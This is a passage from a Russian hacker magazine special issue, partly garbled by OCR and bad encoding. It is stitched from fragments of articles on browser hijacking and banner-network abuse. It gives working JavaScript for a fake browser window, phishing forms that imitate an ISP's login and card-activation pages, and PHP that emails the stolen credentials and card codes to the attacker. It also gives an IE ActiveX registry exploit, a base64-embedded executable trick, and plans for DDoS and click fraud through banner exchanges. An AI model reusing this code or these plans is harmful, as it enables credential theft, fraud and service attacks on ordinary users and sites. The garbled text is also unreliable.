книги хакеры / журнал хакер / специальные выпуски / Специальный выпуск 29_Optimized

Привет необузданный и великий ALL. Пришла весна, уже тает снег и всплывает г@вно. На улицу надо выходить только за пивом, иначе есть шанс вступить во что-нибудь. А у меня болит голова, и лезут в мою голову совершенно мрачные мысли. Вот и дошла до моей больной головы, идея Donor’а сделать ЭТО. И ЭТО родилось...

ТЕМ, КТО ПИШЕТ ПИСЬМА:

Если ты отсканировал и распознал эту статью, но ошибся хоть в одном знаке, то ни- чего работать у тебя не будет! Поэтому не ленись, лезь в инет и скачивай все коды с описаниями, так ты избегнешь глупых ошибок своего ДНК. Это, как знает любой, даже самый последний ламер, не лечится. Для подводников поясню, перенос строки в JavaScript строго регламентирован и описывается правилами, при верстке кода, который мы приводим в статье, мы можем потерять часть форматирования. Поэтому или учи правила или лезь на сайт за образцом.

ÈÄÅß

Сидел как-то мистер Донор на своей хм-м- м... заднице и размышлял о том, какая, все же, замечательная вещь эти современные сетевые технологии, особенно, в умелых руках: многострадального осла можно по косточкам разобрать и обратно собрать, да так, что бедный юзер умом тронется, а на флэше вообще можно целые он-лайн тулзы мутить! Мысли, как застебать лопоухих ламеров, одна прикольнее другой теснились в башке. Это ж как же все ламоботы свято уверены, что в родном ишаке можно только поп-апы стремные открывать, а с любимыми менюхами и с панелькой с кнопочками ничего слу-

читься не может. Авотфиг! Такой полезный стереотип-с надо использовать! Например, можно заменить все стандартные контролзы, панельки и скролл-бары флэшовыми мувиками и рандомом запускать веселые эффекты. Типа, алерт: «Твой браузер заразился корью!» и весь интерфейс покрывается красными точками :). Или, «Хлебни кислоты, сосунок!» и вся морда обтекает и плавится. Мыслям было тесно, и Донор полез в сеть искать Ноа, чтобы срочняком поделиться во избежание овердоза.

Мастер Ноа подошел к проблеме с сугубо утилитарной точки зрения: это ж НЛП чи- стой воды, наивного юзера можно так запугать и задурить, что он сам, добровольно скачает и установит себе, что угодно, и отдаст тебе любую инфу.

Тут Донор вспомнил, что когда-то давно, когда он был совсем маленьким и глупым, он как-то залез на один порно-сайт и подцепил себе паразита - вместо хоумпаги к нему начала грузиться какая-то платная порнуха. Он потом это дело затрахался из реестра вычищать. Сложив два и два и получив пять, Ноа и Донор пришли к выводу, что если закодить па- гу-паразит, эмитирующую контролзы браузера, и подсадить ее юзеру вместо хомяка, то можно незаметно перехватить контроль над его машиной и получить ценную инфу, а если разместить такую пагу на крупном портале, то получится что-то вроде боевого DNS.

ÓВАС ЕСТЬ ПЛАН, МИСТЕР ФИКС?

Óменя есть три плана! (с) Итак, что же нужно сделать, чтобы натянуть наивного юзера по самые гланды?

1. Заманить юзверя на зло-пагу, где подсадить ему означенного паразита. Сделать это можно сотней грязных способов от спама, до кидания ссылки в популярную конфу - выбирай на вкус.

2. Прописать юзеру в хоупейдж линк на па- гу-паразит aka военный DNS.

3. Показать юзеру неудачную загрузку его реального хомяка или about:blank. Еще неплохая идея сымитировать загрузку сайта M$ (осел иногда самолично вытворяет такое паскудство).

4. Подменить реальные контролзы фейковыми.

5. Отловить адреса, вводимые юзверем в адресную строку, сравнить их со списком «интересных» урлов, таких, как адреса известных провайдеров, icq.com, крупных @-магазинов и т.д., и если такой попался, выдать поддельную страницу соответствующей конторы, а если нет, то отправить юзверя по адресу.

6. На поддельной странице заставить юзера ввести представляющие интересе конфи-

денциальные данные, типа, логин и пасс, код активации интернет-карты и т.д.

7.Сохранить полученные данные и слить себе на мыло.

8.Окончательно задурить юзеру голову, чтобы выиграть время.

Итак, начнем с реализации паразита, чтобы было, чего подсаживать.

ПОДМЕНА ДОМАШНЕЙ СТРАНИЦЫ

В соурсе (view source) нашей паги должен быть такой код. Он откроет наш псевдо-эк- сплорер. Тот, кто читал предыдущие номера, сразу поймет, что при минимальном изменении можно открыть этот эксплорер во весь экран, добавив пользователю неожиданного счастья в отсутствии альтернативы.

<html>

<script>

var windowW = 830 // wide var windowH = 640 // high

var windowX = 0 // from left var windowY = 0 // from top

var urlPop = «rol.htm» var title = «- »

var autoclose = false

s = «width=»+windowW+»,height=«+windowH; var beIE = document.all?true:false

function openFrameless(){ if (beIE){

NFW = window.open(«»,«popFrameless»,«»+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

Кнопочка «Чики-Пуки» и окошко ввода.

À âîò è íàø ìàõà-ãóðó êîä.

NFW.moveTo(windowX,windowY) var frameString=«»+

«<html>»+

«<head>»+

«<title>»+title+»</title>»+

«</head>»+

«<frameset rows=’28,*,21’ framespacing=0 border=0 frameborder=0>»+

«<frame name=’top’ src=’top.html’ scrolling=’no’>»+

«<frame name=’main’ src=’«+urlPop+»’ scrolling=yes>»+

«<frame name=’bottom’ src=’bottom.html’ scrolling=’no’>»+

«</frameset>»+

«</html>»

NFW.document.open();

NFW.document.write(frameString)

NFW.document.close() } else {

NFW=window.open(urlPop,«popFrameless»,«scrollbars,»+s)

NFW.blur()

window.focus()

NFW.resizeTo(windowW,windowH)

NFW.moveTo(windowX,windowY)

}

NFW.focus()

if (autoclose){ window.onunload = fun-

ction(){NFW.close()}

}

}

</script>

<body onload=«javascript:openFrameless();»>

Здесь можно пустить море твоего бреда или излияние твоего больного сознания, но луч- шим вариантом будет стандартная 404 ошибка. У нее меньше всего шансов вызвать подозрение пользователя.

</body>

<html>

Ну, и конечно код окончания нашей паги. Теперь у нас при старте браузера появляется новое окно, в котором мы можем отрываться по полной. С чего начинается Родина? С темплейта в моей голове. Чтобы творить непотребство, надо заставить пользователя поверить, что он еще пользуется своим милым осликом ИЕшкой. Сначала, мы эмулируем окно браузера - нарисуем псевдо-эксплорер, в котором все и будет происходить. Для этого сделаем его скриншот, обрежем лишнее и сверстаем в HTML страничку (для ленивых: все это можно скачать с сайта). Получили совершенно нефункциональное НЕ4ТО. Нефункциональное потому, что пользователю некуда вводить свои любимые урлы, которые мы должны подменить. Куда бы мы ни

на фулскрин, а оставить часть родных контролзов, правда, шанс успеха тогда падает.

ЧТО БЫ ТАКОЕ ПОКАЗАТЬ?

На данном этапе мы имеем: почти полноценный браузер, в котором нам нечего показать. Для того чтобы все-таки что-то показывать, мы должны понять, чего мы хотим от того ламера, который попадет в наши сети. Я хочу от него личный логин/пароль к РОЛ’овскому диалапу и, конечно, активационный код новой карточки, который он введет в поле для пополнения СВОЕГО (читать МОЕГО) баланса. Еще я хочу от него логин/пароль к его АСЬКЕ (но это для понту). Поэтому продолжим наш

МОЗГовой штурм. Теперь, когда МЫ все это поняли и оценили трудности, нам надо несколько страниц обманок, функциональность бэк-офиса РОЛа и скрипты, которые все эту белиберду обработают. В этом вопросе проще всего реализовать всякие проверки и отправки на мыло через php. Сразу скажу, если твой хостер имеет тебя в плане сендмейла или дерет непотребно в плане прав, то я могу тебе только посочувствовать. Конечно, говорят, что на халяву и уксус сладкий, но мы то уксус не пьем в принципе. Только пшеничный франциСКАНЕР с кальМАРчиКАми, бЕЙлиС с чипСАМИ или сухой ЧИНзаНО под моченые яБЛОЧКИ.

Чтобы сделать паги-обманки, нам нужен все тот же, наш любимый и ненаглядный продукт мега-корпорации русских засл(R)анцев мелкомягких, ОСЛИК ИЕ! Скачиваем полностью все станицы с картинками, ручками в тот отстой, который сделал осел, ПЕРЕвставляем каскадные таблицы стилей (ну он имеет по полной программе). Дальше исправляем в css пути в бэкграунду и ручками ска- чиваем данные бэкграунды (их осел игнорирует, замечено в версии 5.0 при скачивании c web.icq.com). Также ручками исправляем ошибки осла с ифреймами, рекламой, различными аквив-иксами и счетчиками. Для РОЛа мне пришлось сделать 4етыре обманки. Первая это главная страница (на ней я исправил адрес в Личный кабинет). Вторая - запрос логина/пароля, вместо апач-автори- зации у РОЛа. Третья - сам Личный кабинет РОЛовчанина. Четвертая ввод кода активации РОЛовской карточки. В некоторые эти страницы я вставил php’шки которые обра-

<table width=90% height=90% border=0 cellspacing=0 cellpadding=0><form method=post action=post.php><tr>

Опустим избыточный код.

<input type=text size=12 maxlength=60 na- me=n1 style=«font-family: Arial; font-si- ze: 12px; width:200; height:20px;»>

Снова опустим избыточный код.

<input type=password size=12 maxlength=60 name=n2 style=«font-family: Arial; fontsize: 12px; width:200; height:20px;»>

Опять опустим избыточный код.

<INPUT type=«checkbox» name=«Order» va- lue=«DSN»> Save this password in your password list

И еще раз опустим избыточный код.

<input type=submit name=do value=’Ok’ style=«width:90»> &nbsp; &nbsp; <input type=submit name=do value=’Cancel’ style=«width:90»><br>

Ну, и опустим избыточный код

</tr></form></table>

Кстати, опять обрати внимание, как верстается открывающий и закрывающие тэги ФОРМЫ, это важно при желании избежать излишних пробелов. При нажатии передали инфу и скрипт заработал:

<?

$timeall = ‘Date: ‘.Date( ‘D, d M Y H:i:s ‘).$SIGN.sprintf( ‘%02d%02d’,floor($ZONE/3600),floor(($ZONE%3600)/60)). «\n»;

$msg .= $timeall;

$msg .= «REMOTE_ADDR: $REMOTE_ADDR\n»; $host = gethostbyaddr(«$REMOTE_ADDR»); $msg .= «HOST: $host\n»;

Этот скриптик передает необходимый минимум информации кроме логина и пароля. Я его уже описывал как-то на страницах журнала. Вместо sex@sex.ru должен быть твой e@mail, на него будет приходить «ценная» инфа. Скрипт после отправки мыла сразу переходит на пагу rvoffice.php и явным образом передает на нее переменную userlogin, это логин пользователя. С помощью этого логина, мы будем пытаться заставить пользователя поверить, что он в своем Личном кабинете. Для этого у нас по всему rvoffice.php разбросаны

<?php echo $userlogin; ?>

Они выводят введенный пользователем логин, где это необходимо. Например, в полях «Имя пользователя», «Перенаправление почты», «Персональный номер» и т.п. Забыл уточнить, что я для примера брал страницу РОЛа, которая заблокированна и поэтому надо пополнить баланс. Почти все важные ссылки на данной станице идут на пагускрипт addmoney.php, где пользователю предлагают пополнить баланс.

<?

if ($csid==«» or $cert1==«» or $cert1==«» or $cert3==«» or $cert4==«») {}

else {

$timeall = ‘Date: ‘.Date( ‘D, d M Y H:i:s ‘).$SIGN.sprintf( ‘%02d%02d’,floor($ZONE/3600),floor(($ZONE%3600)/60)). «\n»;

$msg = $csid.» - «.$cert1.» - «.$cert1.» - «.$cert3.» - «.$cert4.» \n»;

Не совсем личный кабинет.

$msg .= $timeall;

$msg .= «REMOTE_ADDR: $REMOTE_ADDR\n»; $host = gethostbyaddr(«$REMOTE_ADDR»); $msg .= «HOST: $host\n»;

$topic = «ROL: Card number.»; $email=«sex@sex.ru»;

mail($email, $topic, $msg, «From: sex@sex.ru»);

}

?>

В начале скрипта идет проверка заполнены ли поля активирующие карточку, если да, то они отсылаются тебе на мыло с дополнительной информацией, время, IP’шник, хост.

<HTML>

<HEAD><TITLE>Russia-On-Line Internet card</TITLE></HEAD>

<BODY>

<h1 align=center>Пополнение áаланса</h1> <b>Только äëÿ êлиентов ÐÎË.</b><br>

Äëÿ ïополнения áаланса âведите êîä àктивации Èнтернет-êàðòû è íажмите êнопку «Пополнить áаланс». Âàø áаланс áóäåò ïо- полнен â ñоответствии ñ íоминалом Èíòåð- íåò-êàðòû.

<p>

<font color=«maroon»><b>ВНИМАНИЕ:</b></font>

Некоторые ñåðèè Èнтернет-êàðò íå ìîãóò áûòü èспользованы äëÿ ïополнения áаланса<br>

<font color=«maroon»><b>ВНИМАНИЕ:</b></font>

Асечка, отдайся!

Здесь закрывается страница.

Ух! Вот и написал. ICQ делается по аналогии с login.php, только поля логина пароля вставляются в обманку главной страницы. Под каким-нибудь заголовком, типа «SUPER, PUPER, NEW, Web-ICQ».

ÎÑÅË 666 È ÅÃÎ ÄÛÐÛ

Паразит был уже почти готов, когда всплыла одна маленькая деталь: нужно было как-то подсадить заразу.

Самой известной мазой прописаться без спроса в хомяк к юзеру является знаменитый баг четвертого IE. Следующий код позволял писать в реестр, что угодно, например, свой урл в хомяк:

<script>

document.write(«<APPLET HIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>»);

function pipetz(){ try{

x=document.applets[0]; x.setCLSID(«{F953DC22-1CF0-11D0-

ADB9-00C04FD58A0B}»); x.createInstance(); Shl=x.GetObject(); x.setCLSID(«{0D43FE01-F093-11CF-

8940-00A0C9054228}»);

try{

Shl.RegWrite(«HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Pa- ge», «http://www.pipets.ru»);

}

catch(e){}

}

catch(e){}

}

setTimeout(«pipetz()», 1000); </script>

К сожалению или к счастью, этот баг был успешно пофиксен M$ начиная с IE 5.0, да и антивири успешно делают на этот скрипт свою стойку. Однако воткнуть этот скрипт в подсаживательную пагу, все же, не помешает, так как ламеров, не менявших свой софт со времен царя Гороха, на свете пока еще хоть отбавляй.

ИГРЫ С РЕЕСТРОМ

Вторая маза - это заставить юзверя самолично, своей ламерской рукой прописать себе в реестр нужные нам параметры aka ад-

//REMS by Dronich

//Стандартный çаголовок ïочтовика. MIME-Version: 1.0

//Далее èäåò îписание ôàéëà, ïрописанного в òåëå ïисьма êàê àттачмент. Content-Location:file:///malware.exe

//Закодирован îí ïî áåéç64, ñàìûé êлевый способ êодирования. Content-Transfer-Encoding: base64

//Непосредственно ôàéë. Èмпортируй åãî â почтовик, è òû óвидишь ÀÑÊÈÈ.

//Первые äâà ñимвола - MZ - ýòîãî íàì äо- статочно, ÷òîáû ïонять, ÷то //файло èсполняемое. Íå-ÀÑÊÈÈ ñимволы â ÁÀÒå íå óвидеть :(.

//EXEbegin

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAA-

EA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA

...

è åùå äî ôèãà áелиберды...

...

PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=

//EXEend

//Верхушка ïàãè :). Âñå ïî-ëамоботски просто.

<!— 25.02.03 - http://www.malware.com —> <title>malware.com</title>

<body bgcolor=black scroll=no>

//Óãó. Ñкриптик. Ñмотрим, ÷òî äелают:

<SCRIPT>

//25.02.03 - http://www.malware.com

//Описываем ôункцию. function malware()

{

//Â s êладем ïóòü ê ôàéëó. s=document.URL;

// path êладем òó ÷àñòü s, êоторая äо последних ñлэшей (òî áèøü ÷èñòî ÏÓÒÜ). path=s.substr(-0,s.lastIndexOf(«\\»));

//Åñëè áûëè ESC-chars - óбиваем. path=unescape(path);

//Вписываем â òåëî ÕТМЛки ñледующее (вообще äолжна áûòü îäíà ñтрока, íî ìû âсе равно êомпилить íå ñобираемся): document.write( ‘

Alex Shark (qqqqqwww@ring.by)

Кто нас будет раскручивать? Итак, для на- чала, что может быть использовано для DDOS с использованием баннерообменных сетей? Во-первых, это, конечно, HTML-бан- неры, во-вторых, это Flash-баннеры. HTMLбаннеры представляют собой не что иное, как обычную страничку, только очень компактную и маленькую. Как правило, грузятся внутри тегов <iframe>. Баннеры на основе Flash это тоже HTML-баннеры, но в структуре HTML ничего не записано, это всего-навсего загрузчик swf файла.

Как всегда, перед боем следует основательно подготовиться. Для написания flash советую поставить 4-ую, а лучше 5-ую версию Macromedia Flash, поскольку многие баннерообменные сети не принимают в оборот баннеры, написанные на 6-ом Flash. Для написания HTML-баннеров можешь использовать что угодно, мое предпочтение это FAR. Теперь давай определимся с целью. Их может быть несколько: можно загрузить до потери пульса какой-нибудь сервер, если на сервере есть возможность регистрации, то это просто прелестно. Можно сделать жестокую накрутку своего сайта или счетчика

или даже не своего, если тебе пообещали заплатить за клики, то сколько раз твой баннер покажут, столько по нему и кликнут. В общем, простор для фантазии достаточно велик. Теперь давай разберемся с несколькими возможными жертвами, проще говоря, с баннерообменными сетями.

reklama.uz

Представляет собой страшное детище программиста и дизайнера, вернее людей считающих себя таковыми. Явное преимущество - это слабый контроль за выставляемыми баннерами, ну скажите, кто будет ковырять ваш баннер до потери пульса, если ковыряльщиков всего двое? Его запустят, потыкают и убедятся, что вроде все нормально, на чем и успокоятся. Так что для полевых испытаний это наиболее подходящий кандидат, трафика бешенного не даст, но проверить систему в бою позволит. Помимо картиночных баннеров принимает HTML, Flash, CGI. Форматы 468x60, 100x100, 120х60, 120х600. Из форматов следует выбирать не тот, что по-

больше, нас не интересует графическая красота баннера, а тот, у которого показов больше. Так, если меняют 10 наших показов 468х60 на 20 их показов 100х100, то ты должен вешать у себя 468х60, а боевую модель готовить 100х100. Как делать клоны сайтов, я думаю, объяснять не стоит, главное набрать показов и побольше.

ÌÀÐÊ-ÈÒÒ

Ну да ладно, вот и следующий кандидат (BANNERS.MARK-ITT.RU). Оный предоставляет возможность размещения горизонтальных баннеров 68х60, 100х100, 120х60, 226х131, Flash и вертикальных 234x60, 120x90, 125x125, 120х240, 120х600 и 160x600. Аналогичный контроль, то есть запугивание по полной, и фактически все пустые слова. По показам они будут получше, так, например 468х60 был показан 15828 раз за день, а 100х100 всего 8264 за день. Это, конечно, не Яндекс и не Yahoo, но на простенький внутрифирменный сервачок уже хватит. Главное отличие от предыдущего кандидата это не фокусированный на Узбекистане контингент, то есть IP-адреса бедолаг будут более разношерстными, а зна- чит и суммарный трафик будет больше.

Монстры LBE и RLE

Тут уже с контролем получше, так что не стоит заливать явно бажный HTML-баннер. Тут надо действовать осторожнее, подгружать JavaScript файлы со своего сервера тебе уже не дадут, да и к загрузке картинки не очень хорошо отнесутся, могут вежливо попросить изменить адрес с относительного на абсолютный, но и трафик у них побольше будет. На момент написания статистика следующая: LBE - 2741610 показов, LBE-lite - 1244404, LBE-100 - 3586869, RLE - 24772338. Как ты уже, наверное, заметил, для домашнего сайтика это не просто поток и даже не горная река, это все равно что планетой по комару врезать. Так что тут война уже идет по-крупному, таким трафиком, как уже писалось, был завален украинский сайт обмена баннеров. На всякий случай напомню, что для каждой баннерообменной сети тебе придется сделать «левое» мыло, «левый» сайт - и не какой-нибудь, а толковый и удовлетворяющий правилам баннерообменки (можешь просто его спереть :)).

Стадии лома

Хорош расслабляться, давай поговорим о деле, конкретно, что нам надо. Есть нес-

колько финальных стадий, которые мы хотим с тобой получить.

Первая стадия - это кумулятивный показ. Кумулятивный - это когда из 1 ты делаешь 2, из 2 делаешь 4 и т.д. То есть саморастущая прибыль. Для осуществления сего требуется не сильно широкий канал, не очень большой сайт, да и вообще мало что требуется. Будем делать с тобой из показов показы. Допустим, у нас есть 1 показ, это гарантирует, что твой баннер где-нибудь покажется, но показы считаются только с твоего сайта, значит надо, чтобы внутри твоего баннера показался твой сайт (как минимум - твой баннер на твоем сайте). Самый простой (сразу оговорюсь, он не прокатит) способ для HTML-баннеров - это сделать внутри своего баннера <iframe> вставку с твоим сайтом. Но этот вариант умрет еще в зародыше, аналогично погибнет открытие второго фрейма, так что выкинь этот детский лепет из головы.

Вторая стадия - это накрутка счетчика, тут достаточно (как правило), чтобы картинка счетчика просто загрузилась. Многие счет- чики слабо следят за referer ссылкой, хотя если это spylog, то тут лучше идти по способу баннера, то есть подделывать все (чуть ниже ты узнаешь, как это делать). Однако счетчик надо крутить не один раз за показ, а каждые 2-3 секунды, так что придется сделать мувик и на один из кадров подвесить action - крутилку счетчика.

Третья стадия наиболее грязная, но весьма пригодится спамерам, это глобальная раскрутка сайта. Как правило, ее можно

Помни, CTR выше 10% дают только порнобаннеры, а они запрещены!

использовать там, где платят за привлече- ние посетителей, а не за легальное и правильное привлечение посетителей. Проще говоря, для раскрутки порнухи. Делается все слишком просто, надо сделать в любом месте (лучше все же на центральном кадре мувика) action на загрузку страницы в области «_blank» или «_top», но чтобы об этом не узнали при проверке баннера, тебе придется дочитать статью :).

И наконец, глобальный натиск, завал канала сайта, или попросту заплевывание его запросами. Как ни странно, но осуществляется это проще, чем раскрутка баннера, зато защищать баннер от нососовательства в него придется более тщательно, поскольку нормального результата можно добиться, используя только глобалистов типа RLE или LBE, а там ребята получают килобаксы за проверку твоих творений, и будь уверен, при малейшем подозрении они тебя отшвырнут, просто так, на всякий случай. Престиж и имя для них высоко ценятся.

Рождение баннера

Итак, давай приступим к самому страшному и, в принципе, самому трудному. Давай сделаем баннер. Прежде всего, необходимо сделать мыло, халявное и не обязательно красивое. Маленький секрет, регистрируйся везде от женского имени, меньше будет запарок при проверках. Затем надо создать/скатать сайт, любой, лишь бы он удовлетворял требованиям баннерообменки. Затем надо заказать код баннера и как следует в нем разобраться.